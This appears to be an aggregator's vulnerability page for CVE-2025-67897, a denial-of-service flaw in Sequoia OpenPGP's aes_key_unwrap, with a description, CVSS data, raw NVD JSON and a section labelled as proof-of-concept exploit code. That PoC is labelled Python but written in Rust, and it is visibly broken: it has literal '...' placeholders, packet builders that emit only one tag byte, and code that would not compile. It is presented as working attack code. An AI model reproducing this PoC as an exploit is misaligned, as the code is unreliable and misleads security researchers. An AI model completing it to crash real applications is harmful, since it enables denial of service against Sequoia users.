Security Vulnerability Report
中文
CVE-2025-67897 CVSS 5.3 MEDIUM

CVE-2025-67897

Published: 2025-12-14 05:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Sequoia OpenPGP < 2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-67897 PoC - Sequoia aes_key_unwrap DoS // This PoC demonstrates triggering panic via short ciphertext use sequoia_openpgp::{Packet, PacketPile, parse::Parse}; use sequoia_openpgp::policy::StandardPolicy; fn main() { // Create a crafted OpenPGP message with short ciphertext // that will trigger panic in aes_key_unwrap let policy = &StandardPolicy::new(); // Malicious PKESK packet with too short ciphertext let malicious_pkesk = create_short_ciphertext_pkesk(); // Attempt to parse and decrypt let packets = PacketPile::from(&malicious_pkesk[..]); match packets { Ok(pile) => { // This will trigger panic when processing for packet in pile.descendants() { if let Ok(_decrypted) = packet.decrypt(policy, ...) { // Processing continues } } }, Err(e) => println!("Parse error: {}", e), } } fn create_short_ciphertext_pkesk() -> Vec<u8> { // Construct PKESK with ciphertext shorter than expected (e.g., 7 bytes) // Normal ciphertext should be multiple of 8 bytes, minimum 16 bytes let short_ciphertext = vec![0u8; 7]; // Too short! // Build PKESK packet structure let mut pkesk = Vec::new(); pkesk.push(0x84); // PKESK version 3 tag // ... add key ID, algorithm, and short_ciphertext pkesk } // Alternative: Craft SKESK with insufficient ciphertext length fn create_short_ciphertext_skesk() -> Vec<u8> { let short_ciphertext = vec![0u8; 3]; // Insufficient length // Build SKESK packet with short ciphertext to trigger panic let mut skesk = Vec::new(); skesk.push(0x04); // SKESK version 4 // ... add ESK with short ciphertext skesk }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67897", "sourceIdentifier": "[email protected]", "published": "2025-12-14T05:16:06.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-195"}]}], "references": [{"url": "https://bugs.debian.org/1122582", "source": "[email protected]"}, {"url": "https://gitlab.com/sequoia-pgp/sequoia/-/blob/b59886e5e7bdf7169ed330f309a6633d131776e5/openpgp/NEWS#L7-L26", "source": "[email protected]"}, {"url": "https://gitlab.com/sequoia-pgp/sequoia/-/commit/b59886e5e7bdf7169ed330f309a6633d131776e5", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.